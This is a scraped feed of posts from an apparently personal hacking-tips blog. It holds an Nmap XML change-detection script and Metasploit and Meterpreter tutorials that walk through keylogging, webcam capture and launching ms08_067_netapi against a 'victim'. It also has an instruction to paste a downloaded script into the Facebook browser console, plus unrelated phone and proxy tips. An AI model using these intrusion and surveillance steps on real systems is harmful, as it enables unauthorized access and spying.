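<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd"/></port>
<port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/>
<service name="microsoft-ds"/></port>
</ports></host>
<host><status state="down" reason="no-response"/>
<address addr="192.168.11.29" addrtype="ipv4"/></host>
</nmaprun>
"""

# Constructed follow-up scan of the same hosts: port 3389 has appeared on the first host.
CURRENT_XML = BASELINE_XML.replace(
    "</ports></host>",
    '<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/>'
    '<service name="ms-wbt-server"/></port></ports></host>',
)


def parse_nmap_xml(text):
    """Return a list of hosts: {addr, hostname, state, ports: [{port, proto, state, service}]}."""
    root = ET.fromstring(text)
    if root.tag != "nmaprun":
        raise ValueError("not an Nmap XML report")
    hosts = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        hn = host.find("hostnames/hostname")
        entry = {
            "addr": addr.get("addr") if addr is not None else None,
            "hostname": hn.get("name") if hn is not None else None,
            "state": host.find("status").get("state"),
            "ports": [],
        }
        for port in host.findall("ports/port"):
            svc = port.find("service")
            # Join name/product/version into one label, skipping absent attributes.
            label = ""
            if svc is not None:
                label = " ".join(v for v in (svc.get("name"), svc.get("product"),
                                             svc.get("version")) if v)
            entry["ports"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": port.find("state").get("state"),
                "service": label,
            })
        hosts.append(entry)
    return hosts


def open_ports(hosts):
    """Map addr -> {(proto, port)} for ports reported open on hosts that are up."""
    return {
        h["addr"]: {(p["proto"], p["port"]) for p in h["ports"] if p["state"] == "open"}
        for h in hosts if h["state"] == "up"
    }


def newly_open(baseline_xml, current_xml):
    """Per host, the ports open now that were not open in the baseline scan."""
    before = open_ports(parse_nmap_xml(baseline_xml))
    after = open_ports(parse_nmap_xml(current_xml))
    changes = {}
    for addr, ports in after.items():
        added = ports - before.get(addr, set())
        if added:
            changes[addr] = sorted(added)
    return changes


if __name__ == "__main__":
    for host in parse_nmap_xml(BASELINE_XML):
        print(host["addr"], host["state"], [(p["port"], p["service"]) for p in host["ports"]])
    print("newly open:", newly_open(BASELINE_XML, CURRENT_XML))
```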
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com1tag:blogger.com,1999:blog-5075788214695190708.post-78034675346454379032015-05-02T00:25:00.000-07:002015-05-02T00:25:00.469-07:00METERPRETER BASICS<div dir="ltr" style="text-align: left;" trbidi="on">
<br /> <span style="font-size: x-large;"><b>METERPRETER </b></span><i><b>Basics</b></i> <br /><br />AFTER YOU GET A SESSION WITH THE HELP OF <a href="http://prasoon-nigam.blogspot.in/2015/05/metasploit-basics.html" target="_blank">Metasploit </a> HOW TO USE <b>meterpreter</b>: HERE ARE THE basics<br /><br />HERE's THE SECRET <br /><br /><br />Meterpreter is one of the spearheads in the Metasploit framework. <br />It is used as a payload post exploitation of a vulnerable system. <br />It uses in-memory DLL injection stagers and is extended over the network at runtime.<br />In-memory DLL injection is a technique used for injecting code within the address space of a currently running process by forcing it to load a DLL (Dynamic-Link Library) file<br /><br />The single payload is very effective with its multiple capabilities <br />> helps in acquiring password hashes of a victim machine<br />> running a keylogger and <br />> privilege escalation.<br /><br />The stealth feature makes it undetectable to many antivirus and host based intrusion detection systems<br />Meterpreter also has the capability to switch between different processes to which it gets attached through DLL injection, and it stays by clinging to a running application on the compromised host rather than creating a new process on the system <br /><br /><b>Classified commands </b><br /><br />> Command type<br />> Command name<br />> Description<br /><br /><b>Commands </b><br />Process listing<br /><br />> getuid -> It gets the system ID & the name of the computer <br />> kill -> It terminates a process<br />> ps -> It lists the running processes <br />> getpid -> It gets the current process identifier<br /><br /><b>Keylog Usage</b><br />> keyscan_start -> It starts the keylogging session<br />> keyscan_stop -> It stops the keylogging session<br />> keyscan_dump -> It dumps the keystrokes captured from the victim machine<br /><br /><b>Session</b><br />> enumdesktops -> It lists all of the accessible desktops and 
workstations<br />> getdesktop -> It gets the current Meterpreter desktop<br />> setdesktop -> It changes the Meterpreter's current desktop<br /><br /><b>Sniffer Functions </b><br />> use sniffer -> It loads the sniffer functions<br />> sniffer_start -> It starts the sniffer for the interface<br />> sniffer_dump -> It dumps the network capture of the victim machine locally<br />> sniffer_stop -> It stops the sniffer for the interface<br /><br /><b>Webcam Commands </b><br />> webcam_list -> It lists all of the webcams of the system<br />> webcam_snap -> It captures snapshots of the victim machine <br />> record_mic -> It records the sound of the environment from the default microphone on the machine <br /><br />> sysinfo -> to check the system information <br />> screenshot -> capture a screenshot of the victim machine<br />> ps -> will show the running processes<br /><br />*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keyscan_start (and wait for a few minutes to capture the keystrokes of the victim machine ) -> keyscan_dump -> keyscan_stop (to dump and stop the keystroke capture )<br /><br />*> webcam_snap ( you get the snap from the webcam)<br /><br />*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the victim computer)<br /><br /><br />Vulnerability scanning and Information Gathering <br /><br />:> Information Gathering Through Metasploit <br />Information gathering is the process of collecting information about a victim. 
<br />It is divided into two steps <br />> Footprinting <br />> Scanning<br /><br />The Metasploit auxiliary modules have various scans from ARP to SYN<br />service-based scans <br />> HTTP<br />> SMB<br />> SQL<br />> SSH<br /><b><br />Methods for Information Gathering</b><br /><br />>> whois <br /> It is widely used for querying databases that store the registered users of an Internet resource <br /><br />type in msfconsole <br /> whois <domain name><br />example whois hackingartz.com<br /><br />To get e-mails we use e-mail harvesting <br />> E-mail harvesting is a very useful tool to get the e-mail IDs associated with a particular domain<br /><br />syntax<br /> use auxiliary/gather/search_email_collector -> show options -> set domain <domain name> -> run<br />for example :- set domain hackingartz.com<br /><br />Active Information Gathering <br /><br />A useful auxiliary scanner is the telnet version scanner <br /><br />syntax <br /> use auxiliary/scanner/telnet/telnet_version -> show options -> see that the RHOSTS field is empty<br /><br />syntax<br /> set RHOSTS <target ip address> <br /> for example :- set RHOSTS 192.168.0.103 -> run <br /><br />To find whether a Remote Desktop connection (RDP) is available we use the RDP scanner<br />To know about the RDP port number<br /><br />Syntax : type in <br /> use auxiliary/scanner/rdp/ms12_020_check -> show options<br />after getting the port we set RHOST <br /><br />syntax<br /> set PORTS (port no.) -> set PORTS 3389<br /> set RHOST (ip address) -> set RHOST 192.168.11.46<br />when done with all the options type run <br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-77306564671127632015-05-01T23:38:00.003-07:002018-06-18T07:57:52.656-07:00MetaSPLOIT BASICS <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span style="font-size: x-large;"> <span style="color: red;"> METASPLOIT</span></span><br />
<br />
<span style="font-size: small;">>Metasploit Framework is an open source project created by HD Moore in 2003 and acquired by Rapid7 LLC on October 21, 2009.<br />>It includes hundreds of exploits and payloads.<br />>It is considered one of the best penetration testing tools, with support for vulnerability assessment using Nessus and other famous tools.<br />>It is written in Ruby.<br />>Metasploit supports all platforms including Windows, Linux and Mac OS</span><br />
<span style="font-size: small;">*************<br />use nmap in Metasploit => <a href="http://prasoon-nigam.blogspot.in/2015/05/nmap-in-metasploit.html" target="_blank">NMAP in metasploit click on me :)</a></span><br />
<span style="font-size: small;">METERPRETER BASICS => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">LEARN how to use METERPRETER Click on me :)</a></span><br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
<span style="font-size: small;">***************************************<br /><br />The Metasploit Framework interfaces are these <br />> MsfGUI <br />> Msfcli<br />> Msfweb<br />> Metasploit Pro<br />> Armitage<br /><br />The library architecture in Metasploit is as follows:<br /><br /><b>> Rex:</b> This is the basic library used in Metasploit for various protocols, transformations and socket handling. It supports SSL, SMB, HTTP, XOR, BASE64, and random text.<br /><br /><b>> Msf::Core</b>: This library defines the framework and provides the basic application interface for Metasploit.<br /><b><br />> Msf::Base</b>: This library provides a simplified and friendly application interface for the Metasploit Framework<br /><br />*) cd /opt/metasploit/msf3 to enter the metasploit framework directory -> ls<br /><br />> <b>The important directories listed are</b> <br />data<br />external<br />tools<br />plugins<br />scripts<br /><br />cd data/ => contains meterpreter, exploits, wordlists, templates & many more<br /><br />cd meterpreter/ => .dll files (.dll files as well as other interesting things, which are typically required to enable the Meterpreter functionality called post exploitation.)<br /><br />> wordlist directory -> a directory inside the data directory. It contains lists of usernames and passwords for different services such as HTTP, Oracle, Postgres, VNC, SNMP and more.<br /><br />> To update Metasploit -> msfupdate<br /><br /><b>Exploits</b> </span><br />
<span style="font-size: small;">An exploit is a computer program that takes advantage of a particular vulnerability <br />> cd /opt/metasploit/msf3/modules/exploits -> ls -> cd windows (going into windows) -> ls<br />to view the code of any exploit we type -> cat <exploitname> -> cat ms08_067_netapi.rb<br /><br /><b>Auxiliary</b><br />Auxiliary modules are exploits without a payload. <br /><br />> There are different types of auxiliary modules such as<br />scanners for protocols<br />Network protocol fuzzers<br />Port scanner modules <br />wireless <br />Denial of service modules <br />Server modules <br />Administrative access exploits and so on.<br /><br />**) ls -> ftp -> cat <module name> to see the module <br /><br /><b>PAYLOADS</b><br />A payload is a piece of software that runs after a system is compromised. The payload is typically attached to and delivered with an exploit<br /><br />*) 3 different types of payloads <br />> Singles<br />> Stagers <br />> Stages <br /><br /><b>Stages :</b> The main role of staged payloads is that they use a tiny stager to fit into small exploitation spaces. During exploitation, an exploit developer has a very limited amount of memory that he can play with. The stagers use this space and their work is to pull down the rest of the staged payload.<br />Stages are the type of payload that are downloaded and executed by the stager payload, such as Meterpreter, VNC server and so on.<br /><br /><b>Singles :</b> Singles are self contained payloads for a specific task such as creating a user, binding a shell, and so on.<br /><br /><b>Stagers :</b> The stagers use the space and their work is to pull down the rest of the staged payload.<br />Stagers are payloads that make a connection between the attacker and the victim machine. <br />Example <br />If we want to inject a Meterpreter payload we cannot fit the entire Meterpreter DLL into one payload, so the entire process is broken up into two parts. The first is the smaller payload called the stager. After the stager is executed it makes a network connection between the attacker and the victim. <br />Over this network connection a larger payload is delivered to the victim machine, and this larger payload is known as the stage.<br /><br /><br />> Payloads are categorized according to OS such as AIX, BSD, Windows, Linux and so on.<br /><br /><b>EXPLOITATION </b><br /><br />Exploitation refers to the art of compromising a computer system. The basics of computer exploitation involve a deep understanding of vulnerabilities and payloads. <br />An exploit is a piece of well-written code, compiled and executed on a targeted system, which may compromise that system.<br /><br />An exploit usually targets a known vulnerability, a flaw in a service or poorly written code. <br /><br /><b>BASIC TERMS OF EXPLOITATION </b><br /><br /><b>> Vulnerability </b>: A vulnerability is a security hole in software or hardware, which allows an attacker to compromise a system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack <br /><br /><b>> Exploit : </b>An exploit refers to a well known security flaw or bug with which a hacker gains entry into a system. An exploit is the actual code with which an attacker takes advantage of a particular vulnerability.<br /><br /><b>> Payload : </b>Once an exploit executes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered. <br /><br /><b>> Shellcode : </b>This is a set of instructions usually used as a payload when the exploitation occurs.<br /><br /><b>> Listener : </b>A listener works as a component waiting for an incoming connection.<br /><br />======================<br />KEEP safe ur ANDROID => <a href="http://prasoon-nigam.blogspot.in/2014/08/how-to-find-stolen-or-lost-android-phone.html" target="_blank">CLICK ON me ;)</a><br />10 PROXY Websites => <a href="http://prasoon-nigam.blogspot.in/2013/10/top-10-proxy-websites-to-unblock-any.html" target="_blank">Click on me :))</a><br />=============================================<br /><br />The biggest question: how does exploitation actually work?<br /><br />Here's the SECRET FINALLY REVEALED <br /><br />An attacker basically sends an exploit with an attached payload to the vulnerable system.<br />The exploit runs first and if it succeeds, the actual code of the payload runs.<br />After the payload runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data, upload malware, viruses, backdoors or whatever he wants.<br /><br />How a system is compromised <br /><br />Step 1 : Scan the IP Address to find<br /> open ports -> operating system -> services <br />Step 2 : Identify a vulnerable service and find an exploit in Metasploit for that particular service.<br /><br />Step 3 : If the exploit is not available in Metasploit :: go through the internet databases such as <br />>> www.securityfocus.com<br />>> www.exploitdb.com<br />>> www.1337day.com<br /><br />Step 4 : After successfully finding an exploit<br /><br />Step 5 : we launch the exploit and compromise the system.<br /><br /><br /><b>Tools used </b><br /><br />> Port scanners are Nmap (Network Mapper), Autoscan, Unicorn Scan and so on.<br /><br />Syntax for nmap<br /> nmap -v -n ip address<br /><br />-v verbose -> to get verbose output<br />-n -> parameter to disable reverse DNS resolution<br /><br />Syntax for an intense scan by nmap <br /> nmap -T4 -A -v ip address<br /><br />====================<br />NMAP tutorials => <a href="http://prasoon-nigam.blogspot.in/2012/03/nmap-tutorial-backtrack.html" target="_blank">Click on me :)</a><br />Recover JPEG FILES => <a href="http://prasoon-nigam.blogspot.in/2012/05/recover-jpeg-files-with-backtrack.html" target="_blank">CLick on me :))</a><br />==================================================<br /><br />After gathering information -> open msfconsole -> search dcom (it searches all of the Windows RPC related exploits in its database)<br /><br />Searching for an exploit in Metasploit through the <br />syntax<br />search <service name> command<br />Note : if the exploit is not available in Metasploit, then we have to search the Internet exploit database for that particular exploit.<br /><br />>> How to search for an exploit on these online services <br />open this website => www.1337day.com <br /> Search for exploits on the Windows RPC service<br />find the exploit and save it <br /><br />Now we exploit the target machine <br /><br />as we know, we scanned the IP address and found all the ports <br />and exploit one of those ports <br /><br />launch the terminal -> type gcc <exploit name with path > -o <exploitname> <br />for example <br />gcc dcom.c -o dcom<br /><br />./<filename> <br /><br />use exploit/windows/smb/ms08_067_netapi (in msfconsole) and press enter <br /><br />then show options <br />RHOST (remote host) <br /><br />set RHOST ip address<br /><br />exploit</span><br />
MORE metasploit BASICS and HACKING => METERPRETER => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">Meterpreter Click on me :)</a> </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-27016474651379319322014-08-13T21:26:00.000-07:002014-08-14T10:10:05.386-07:00 How to find STOLEN or LOST android phone<div dir="ltr" style="text-align: left;" trbidi="on">
This blog of mine will be liked and loved by all the people who love their ANDROID phones / tabs<br />
<br />
SO what i am gonna tell you is how to find or search for your lost or stolen mobile :)<br />
<br />
phone can be stolen or lost or misplaced anytime anywhere and by anyone <br />
and sometimes no one is there to help you and people come just for sympathy <br />
"OH ! its so sad your 40,000/- mobile lost"<br />
"OMG how could you misplace your mobile in the shop"<br />
<br />
and what we do is shed some tears, take help from the police or any computer engineers, and in response we get nothing and have to buy a small or less valuable phone than the one we bought before :(<br />
<br />
A mobile phone is what for us ??<br />
<br />
* A friend that makes us time-pass when we are bored <br />
** A place where we keep our secrets<br />
*** A place where we have many memories in text (sms) or in pics (photos)<br />
**** A helper when you are late coming to home <br />
***** Nights talks and love sharing with wife or girlfriend <br />
****** Keep you in touch with all the people you want in your life and much more <br />
<br />
SO all these things are made possible by the phone, so it must have some small security for its care<br />
<br />
HERES' THE SECRET <br />
<br />
Download an APP named ANDROID LOST <br />
<br />
Download or install app => <a href="https://play.google.com/store/apps/details?id=com.androidlost&hl=en" target="_blank">Click on me :) </a><br />
<br />
***********<br />
how to download apk file of android => <a href="http://prasoon-nigam.blogspot.in/2013/03/download-android-applicatoins-files.html" target="_blank">click on me :))</a><br />
**********************<br />
<br />
so after installing this app you need<br />
1) a gmail account<br />
2) synchronize that gmail account in your phone <br />
3) you can also install it with the help of the Play Store present in your phone <br />
<br />
Features of ANDROID LOST app<br />
when your phone is lost, here is what you can do with the help of this app<br />
<br />
*read message<br />
** read call history <br />
*** raise alarm <br />
**** get mobile location <br />
***** get imei no. <br />
****** get photo of rear and front camera <br />
******* lock phone change pic<br />
******** delete everything u have in your data sd card<br />
********* make phone silent and vibrate<br />
and much more if u want :: u can read everything in detail over here <a href="http://www.androidlost.com/" target="_blank">click on me :) </a><br />
<br />
NOW WHAT YOU HAVE TO DO AFTER INSTALLING THIS APP ??<br />
<br />
after installing this <br />
<br />
* synchronize your phone with gmail id <br />
** go to the website <a href="http://www.androidlost.com/" target="_blank">Android lost </a>or <a href="http://www.androidlost.com/" target="_blank">Click on me :)</a> and sign in the website and track your mobile simple <br />
just 3 steps and you can trace your mobile phone <br />
<br />
Here is the Video tutorial :: How to use Android lost app <br />
<br />
<a href="https://www.youtube.com/watch?v=NU6oK94HHag" target="_blank">Click on me :) </a><br />
Installing tutorial => <a href="https://www.youtube.com/embed/gcTZbreowJM?ps=play&vq=large&rel=0&autohide=1&showinfo=0&autoplay=1&authuser=0" target="_blank">Click on me :)</a><br />
<a href="https://www.youtube.com/watch?v=JZToutMg5UI" target="_blank">How to use it Detail Click on me :)</a><br />
<br />
SO keep your phone SAFE <br />
Just one app helps you a lot, so no need of taking help and finding yourself with the question "Now what do I DO ?" <br />
<br />
Be Safe and be Ethical <br />
Pprasoon Nigam<br />
Security Expert </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-17043403800159158232014-04-24T20:01:00.005-07:002014-08-13T20:45:40.461-07:00How to use two WhatsApp in one Android device <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: left;">
<span style="font-size: large;">How to use two WhatsApp on one Android phone</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;">or</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: large;">Use two WhatsApp without rooting up mobile phone </span></div>
<div style="text-align: left;">
<br />
<span style="font-size: small;">many of u are thinking, am I joking or kidding? is it really true? if yes then tell me how?<br /><br />Why two WhatsApp <br /><br />* to make urself different <br />** to keep some people away from ur personal no. <br />*** want to have a personal no. with a personal WhatsApp for ur lover <br />**** just to show yeah i can do this, i have two WhatsApp <br />****** <span style="color: red;">mobile is not rooted (no rooting is needed) so u can keep ur warranty and guarantee </span><br /><br />now how to do it, that's the important part <br /><br />HERE'S THE SECRET </span><br />
<span style="font-size: small;">*********************</span><br />
<span style="font-size: small;">tag all ur friend in comment in one click => <a href="http://prasoon-nigam.blogspot.in/2013/11/steps-to-follow-for-tagging-all-friends.html" target="_blank">Click on me :))</a></span><br />
<span style="font-size: small;">protect ur computer with virus and trojans => <a href="http://prasoon-nigam.blogspot.in/2013/11/protect-your-computer-laptopmobile.html" target="_blank">Click on me :))</a></span><br />
<span style="font-size: small;">***********************************************<br /><br />first of all back up all ur chats of WhatsApp <br /><br />Steps <br /><br />Go to settings => then to chat settings and click on the backup option <br />after backing up ur WhatsApp<br /><br />*** go to settings, then to the apps settings, and uninstall ur WhatsApp <br /><br />**** when u have uninstalled it then go to storage => phone storage and find the WhatsApp folder <br /><br /><span style="color: red;">rename ur WhatsApp folder to WhatsAppold </span><br />** once u have renamed ur WhatsApp folder, install a new WhatsApp from the Play Store, open it up and put ur new number (mobile number) in it, then continue and agree to all the terms and do all that stuff u do to register in WhatsApp, but remember with <span style="color: lime;">ur new phone no.</span><br /><br />::: ** NOW HERE IS THE IMPORTANT PART FOR REGISTERING THE SECOND WHATSAPP NO.<br /><br />now go to storage and into phone storage </span></div>
<span style="font-size: small;">=>>> now rename ur whatsappold folder to OGWhatsApp</span><br />
<span style="font-size: small;"><br /> <span style="color: red;"> Rename "WhatsAppold => OGWhatsApp"</span><br /><br />now download the apk file named "<span style="color: lime;">OGWhatsApp</span>" <br /><br />to download OGWhatsApp => <a href="http://www.filefactory.com/file/27yv9e863v8x/OGWhatsApp%20v2.11.209.apk" target="_blank">Click on me :) </a><br /><br /><br />** Now install OGWhatsApp with the help of the apk file i have given u and then register urself with ur <span style="color: lime;">previous no. (or the old no.) </span>and here you go with two WhatsApp with two different no.</span><br />
<br />
************<br />
wifi hacking GUI software in backtrack => <a href="http://prasoon-nigam.blogspot.in/2012/08/wifi-hacking-with-gerix-in-backtrack.html" target="_blank">Click on me :))</a><br />
cracking hash codes with backtrack => <a href="http://prasoon-nigam.blogspot.in/2012/04/cracking-hash-backtrack-5.html" target="_blank">Click on me :))</a><br />
************************<br />
<br />
<span style="font-size: large;">Summary </span><br />
<br />
*.* WhatsApp have ur new no. registered <br />
*.* OGWhatsApp have ur old no. registered<br />
*.* if u want u can do vice versa but u will mess up with backup data </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com1tag:blogger.com,1999:blog-5075788214695190708.post-71591404623065927722013-11-26T02:05:00.001-08:002014-08-13T21:05:06.309-07:00Steps To Follow For tagging All Friends In A single Click <div dir="ltr" style="text-align: left;" trbidi="on">
Steps To Follow For tagging All Friends In A single Click :<br />
<br />
HERE'S THE SECRET <br />
<br />
this code or trick basically works on google chrome :: you can <br />
<br />
********<br />
How to close Ports => <a href="http://prasoon-nigam.blogspot.in/2013/08/how-to-close-ports.html" target="_blank">Click on me :)</a><br />
105 Useful Websites => <a href="http://prasoon-nigam.blogspot.in/2013/09/list-of-105-useful-websites-for-every.html" target="_blank">Click on me :)</a><br />
**********************************************<br />
<br />
<span style="font-size: large;">Post Your Status.</span><br />
<br />
Now click on time of your status so that it will open in new tab along <br />
<br />
with your status link.<br />
<br />
Now press CTRL+SHIFT+J , now you can see a new window, just move onto <br />
<br />
CONSOLE tab.<br />
<br />
<span style="font-size: large;">download below given link and paste it in CONSOLE tab .</span><br />
<br />
Download the code => <a href="http://www.filefactory.com/file/jo9ihvenkbz/code%20for%20tagging%20friends.txt" target="_blank">Click on me :))</a><br />
<br />
<br />
<u><span style="color: red;">for example IMPORTANT</span></u><br />
this the code starting <br />
(<br />
function x__0(){return window.ActiveXObject?new ActiveXObject<br />
<br />
("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var<br />
<br />
e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter<br />
)<br />
<br />
<br />
*_* now remove the gaps <br />
<br />
(<br />
function x__0(){return window.ActiveXObject?new ActiveXObject <br />
("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var <br />
e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter<br />
) <br />
<br />
Like this, and you are done :: thank you, enjoy<br />
<br />
<br />
After pasting the above script, finally press ENTER and enjoy.<br />
<br />
Voila, you're done !! Now just wait <br />
<br />
Thanks & regards from<br />
<a href="http://www.hackingartz.com/" target="_blank">www.hackingartz.com</a></div>
Pprasoon, 2013-11-06T22:07:00.001-08:00: Top 107 Command Prompt<div dir="ltr" style="text-align: left;" trbidi="on">
Top 107 Command Prompt commands<br /><br />HERE's THE SECRET <br /><br /><br />
1. Accessibility Controls - access.cpl<br />
2. Accessibility Wizard - accwiz<br />
3. Add Hardware Wizard - hdwwiz.cpl<br />
4. Add/Remove Programs - appwiz.cpl<br />
5. Administrative Tools - control admintools<br />
6. Automatic Updates - wuaucpl.cpl<br />
7. Bluetooth Transfer Wizard - fsquirt<br />
8. Calculator - calc<br />
9. Certificate Manager - certmgr.msc<br />
10. Character Map - charmap<br />
11. Check Disk Utility - chkdsk<br />
12. Clipboard Viewer - clipbrd<br />
13. Command Prompt - cmd<br />
14. Component Services - dcomcnfg<br />
15. Computer Management - compmgmt.msc<br />
16. Control Panel - control<br />
17. Date and Time Properties - timedate.cpl<br />
18. DDE Shares - ddeshare<br />
19. Device Manager - devmgmt.msc<br />
20. DirectX Troubleshooter - dxdiag<br />
21. Disk Cleanup Utility - cleanmgr<br />
22. Disk Defragmenter - dfrg.msc<br />
23. Disk Management - diskmgmt.msc<br />
24. Disk Partition Manager - diskpart<br />
25. Display Properties - control desktop<br />
26. Display Properties - desk.cpl<br />
27. Dr. Watson System Troubleshooting Utility - drwtsn32<br />
28. Driver Verifier Utility - verifier<br />
29. Event Viewer - eventvwr.msc<br />
30. Files and Settings Transfer Tool - migwiz<br />
31. File Signature Verification Tool - sigverif<br />
32. Findfast - findfast.cpl<br />
33. Firefox - firefox<br />
34. Folders Properties - control folders<br />
35. Fonts - control fonts<br />
36. Fonts Folder - fonts<br />
37. FreeCell Card Game - freecell<br />
38. Game Controllers - joy.cpl<br />
39. Group Policy Editor (for XP Professional) - gpedit.msc<br />
40. Hearts Card Game - mshearts<br />
41. Help and Support - helpctr<br />
42. HyperTerminal - hypertrm<br />
43. Iexpress Wizard - iexpress<br />
44. Indexing Service - ciadv.msc<br />
45. Internet Connection Wizard - icwconn1<br />
46. Internet Explorer - iexplore<br />
47. Internet Properties - inetcpl.cpl<br />
48. Keyboard Properties - control keyboard<br />
49. Local Security Settings - secpol.msc<br />
50. Local Users and Groups - lusrmgr.msc<br />
51. Logs You Out Of Windows - logoff<br />
52. Malicious Software Removal Tool - mrt<br />
53. Microsoft Chat - winchat<br />
54. Microsoft Movie Maker - moviemk<br />
55. Microsoft Paint - mspaint<br />
56. Microsoft Synchronization Tool - mobsync<br />
57. Minesweeper Game - winmine<br />
58. Mouse Properties - control mouse<br />
59. Mouse Properties - main.cpl<br />
60. NetMeeting - conf<br />
61. Network Connections - control netconnections<br />
62. Network Connections - ncpa.cpl<br />
63. Network Setup Wizard - netsetup.cpl<br />
64. Notepad - notepad<br />
65. Object Packager - packager<br />
66. ODBC Data Source Administrator - odbccp32.cpl<br />
67. On Screen Keyboard - osk<br />
68. Outlook Express - msimn<br />
69. Paint - pbrush<br />
70. Password Properties - password.cpl<br />
71. Performance Monitor - perfmon.msc<br />
72. Performance Monitor - perfmon<br />
73. Phone and Modem Options - telephon.cpl<br />
74. Phone Dialer - dialer<br />
75. Pinball Game - pinball<br />
76. Power Configuration - powercfg.cpl<br />
77. Printers and Faxes - control printers<br />
78. Printers Folder - printers<br />
79. Regional Settings - intl.cpl<br />
80. Registry Editor - regedit<br />
81. Registry Editor - regedt32<br />
82. Remote Access Phonebook - rasphone<br />
83. Remote Desktop - mstsc<br />
84. Removable Storage - ntmsmgr.msc<br />
85. Removable Storage Operator Requests - ntmsoprq.msc<br />
86. Resultant Set of Policy (for XP Professional) - rsop.msc<br />
87. Scanners and Cameras - sticpl.cpl<br />
88. Scheduled Tasks - control schedtasks<br />
89. Security Center - wscui.cpl<br />
90. Services - services.msc<br />
91. Shared Folders - fsmgmt.msc<br />
92. Shuts Down Windows - shutdown<br />
93. Sounds and Audio - mmsys.cpl<br />
94. Spider Solitaire Card Game - spider<br />
95. SQL Client Configuration - cliconfg<br />
96. System Configuration Editor - sysedit<br />
97. System Configuration Utility - msconfig<br />
98. System Information - msinfo32<br />
99. System Properties - sysdm.cpl<br />
100. Task Manager - taskmgr<br />
101. TCP Tester - tcptest<br />
102. Telnet Client - telnet<br />
103. User Account Management - nusrmgr.cpl<br />
104. Utility Manager - utilman<br />
105. Windows Address Book - wab<br />
106. Windows Address Book Import Utility - wabmig<br />
107. Windows Explorer - explorer </div>
Pprasoon, 2013-11-03T20:57:00.003-08:00: Protect your computer /laptop/mobile phones from hacker viruses and trojans<div dir="ltr" style="text-align: left;" trbidi="on">
Protect your computer / laptop / mobile phones from hackers, viruses and Trojans<br /><br />HERE's the SECRET<br /><br />
1) <u>Windows Updates</u>: Even the best offerings from computer giants have not been able to completely fight off the attempts of rogue developers to break in. In this situation, it has become almost a necessity for users to update their Windows-based systems on a regular basis. Daily, weekly or even monthly updates will speed up the system and help it counter attacks on its security, thereby decreasing the probability of it being infected by worms and viruses. Desktop monitoring by hackers is indeed a grand problem. <br /><br />
2) <u>Software updates</u>: Like Windows, applications also have to be updated to the latest version. You need to check regularly for wear and tear in the software that your system runs. Web browsers and web-based programs have to be upgraded constantly so hackers do not get their hands on the private and confidential data stored in your system. <br /><br />
3) <u>Antivirus Software</u>: If your system is connected to the internet regularly and you run it without antivirus software, it is almost impossible for hackers not to be attracted to it. If you do not have antivirus software, get one as soon as possible. If you already have one, upgrade it to its latest version and check that the settings are properly defined. <br /><br />
4) <u>Anti-spyware Software</u>: Even though the digital situation looks pretty grim, it still isn’t as bad as the days when Bonzi Buddy and CoolWebSearch gave PC users nightmares. This is because of the anti-spyware software that has shielded the tech world from malicious attacks on its security. <br /><br />
5) <u>Swap your Windows-based system for a Macintosh</u>: The whole tech world knows that Mac’s OS X has the largest number of limitations compared to other computer operating systems. The truth is that most hackers do not bother breaking into a Mac. This is the reason Mac still makes space for itself in the list of secure computer operating systems, despite its shortcomings. <br /><br />
6) <u>Hacker-Controlled websites</u>: Usually, sites that offer free downloads, online games, etc. are operated by hackers. It is a given that you avoid dangerous places, especially if you have valuables on your PC. The same goes for the mechanical world. Steer clear of sites that look suspicious or require you to download something which is not needed. <br /><br />
7) <u>Data Backup</u>: Create a backup of all the important data that you have on your system. Apart from hackers and system crashes, other mishaps may spell death for your hard drives. A tech storm can easily sweep away every bit of data in your system. It’s always better to be safe than sorry. </div>
Pprasoon, 2013-10-31T07:38:00.002-07:00: Top 10 Proxy WebSites To Unblock Any Site<div dir="ltr" style="text-align: left;" trbidi="on">
If you do not want to go through the installation of proxy software, then anonymous browsing with proxy websites is the best option for you.<br /><br />
Here's the SECRET<br /><br />
The best free proxy websites of 2013 that will let you surf the internet anonymously and securely.<br /><br /><br />
1. 000FreeProxy => <a href="http://000freeproxy.com/" target="_blank">000freeproxy</a><br /><br />
2. kkProxy => <a href="http://kkproxy.com/" target="_blank">kkproxy</a><br /><br />
3. MyAddr => <a href="http://www.myaddr.com/" target="_blank">myaddr</a><br /><br />
4. RX Proxy => <a href="http://www.rxproxy.com/" target="_blank">RX Proxy</a><br /><br />
5. AnonyMouse => <a href="http://anonymouse.org/anonwww.html" target="_blank">anonymouse</a><br /><br />
